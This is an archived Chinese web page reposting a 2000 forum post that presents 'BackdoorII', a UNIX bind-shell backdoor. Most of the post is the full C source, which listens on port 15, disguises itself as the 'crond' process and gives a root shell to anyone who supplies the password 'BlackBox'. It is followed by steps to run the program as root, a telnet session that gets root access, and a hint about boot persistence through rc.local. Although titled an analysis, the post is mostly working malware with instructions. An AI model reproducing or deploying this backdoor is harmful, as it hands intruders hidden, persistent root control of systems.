📄 364.htm
字号:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm非常精华下载</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center"> ● UNIX网络编程 (BM: clown) </font></big></big></td></tr>
<tr>
<td width="68%" height="44" bgcolor="#000000"><font face="黑体"><big><big><p align="center"></big></big><a href="http://cterm.163.net"><img src="banner.gif" width="400" height="60" alt="banner.gif"border="0"></a></font></td>
</tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">回到开始</a>][<a href="311.htm">上一层</a>][<a href="365.htm">下一篇</a>]
<hr><p align="left"><small>BackdoorII的分析 <br>
---------------------------------------------------------------------------- <br>
---- <br>
bgyl 于 00-1-11 16:21:28 加贴在 绿盟科技论坛(bbs.nsfocus.com)--UNIX系统安全 <br>
: <br>
BackdoorII的分析 <br>
Backdoor II软件的开发者是CHAMPION(冠军),上个星期,他把大量的时间用在 <br>
开发新的Backdoors,用Linux rootkit4改进了bindshell.c,加入一些新的功能, <br>
可以隐蔽进程的真实名字,这个程序可以binds到一个特别的端口上,下面是它的源 <br>
代码: <br>
------------------------------cut here---------------------------------- <br>
/* b2.c */ <br>
/* modified by CHAMPION */ <br>
/* compile: gcc b2.c -o b2 */ <br>
/* code by pluvius@****** (address removed to protect the innocent :) */ <br>
/* don't forget.. when you connect to the port.. commands are like: */ <br>
/* "ls -l;" or "exit;" (don't forget the ';') */ <br>
#include <stdio.h> <br>
#include <signal.h> <br>
#include <sys/types.h> <br>
#include <sys/socket.h> <br>
#include <netinet/in.h> <br>
#include <string.h> <br>
#define PORT 15 <br>
#define PASS "BlackBox" <br>
#define PS "crond" <br>
int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid; <br>
struct sockaddr_in serv_addr; <br>
struct sockaddr_in client_addr; <br>
int AUTH=0; <br>
char MSG[200]; <br>
int main (int argc, char *argv[]) <br>
{ <br>
memset(argv[0],NULL,strlen(argv[0])); <br>
strcpy(argv[0],PS); <br>
soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); <br>
if (soc_des == -1) <br>
exit(-1); <br>
bzero((char *) &serv_addr, sizeof(serv_addr)); <br>
serv_addr.sin_family = AF_INET; <br>
serv_addr.sin_addr.s_addr = htonl(INADDR_ANY); <br>
serv_addr.sin_port = htons(PORT); <br>
soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, <br>
sizeof(serv_addr)); <br>
if (soc_rc != 0) <br>
exit(-1); <br>
if (fork() != 0) <br>
exit(0); <br>
setpgrp(); <br>
signal(SIGHUP, SIG_IGN); <br>
if (fork() != 0) <br>
exit(0); <br>
soc_rc = listen(soc_des, 5); <br>
if (soc_rc != 0) <br>
exit(0); <br>
while (1) { <br>
soc_len = sizeof(client_addr); <br>
soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, <br>
&soc_len); <br>
if (soc_cli < 0) <br>
exit(0); <br>
cli_pid = getpid(); <br>
server_pid = fork(); <br>
if (server_pid != 0) { <br>
if (AUTH==0) <br>
{read(soc_cli,MSG,sizeof(MSG)); <br>
if (strcmp(PASS,strtok(MSG,"\r\n"))==0) AUTH=1;} <br>
if (AUTH==1){ <br>
server_pid = fork(); <br>
dup2(soc_cli,0); <br>
dup2(soc_cli,1); <br>
dup2(soc_cli,2); <br>
server_pid = fork(); <br>
execl("/bin/sh","sh",(char *)0);} <br>
close(soc_cli); <br>
exit(0); <br>
} <br>
close(soc_cli); <br>
} <br>
} <br>
------------------------------cut here---------------------------------- <br>
缺省的端口是15(netstat),缺省的口令是"BlackBox",你也可以改变这些设置,具体 <br>
是改变PASS和PORT 两个变量。运行这个程序前,要改变进程的名字为"crond", <br>
如果你想用其它的进程名字的话,可以编辑源程序的PS变量,同时你也必须以ROOT <br>
的身份运行这个程序,运行后,请敲入以下的命令: <br>
# netstat -a|grep LISTEN|grep netstat <br>
tcp 0 0 *:netstat *:* <br>
LISTEN <br>
你可以看到这个程序已经BIND到netstat端口, <br>
下面是你验证程序功能的具体过程: <br>
# telnet localhost 15 <br>
Trying 127.0.0.1... <br>
Connected to localhost. <br>
Escape character is '^]'. <br>
BlackBox <br>
id; <br>
uid=0(root) gid=0(root) <br>
groups=0(root),1(bin),14(uucp),15(shadow),16(dialout),65534(nogroup) <br>
: command not found <br>
你可以看见你已经是这台机器的ADMIN,你也可以用UDP来运行它, <br>
此时你需要用编辑以下文件: <br>
for redhat: /etc/rc.d/init.d/rc.local <br>
OK! 柯柯 1/11/2000 <br>
</small><hr>
<p align="center">[<a href="index.htm">回到开始</a>][<a href="311.htm">上一层</a>][<a href="365.htm">下一篇</a>]
<p align="center"><a href="http://cterm.163.net">欢迎访问Cterm主页</a></p>
</table>
</body>
</html>⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -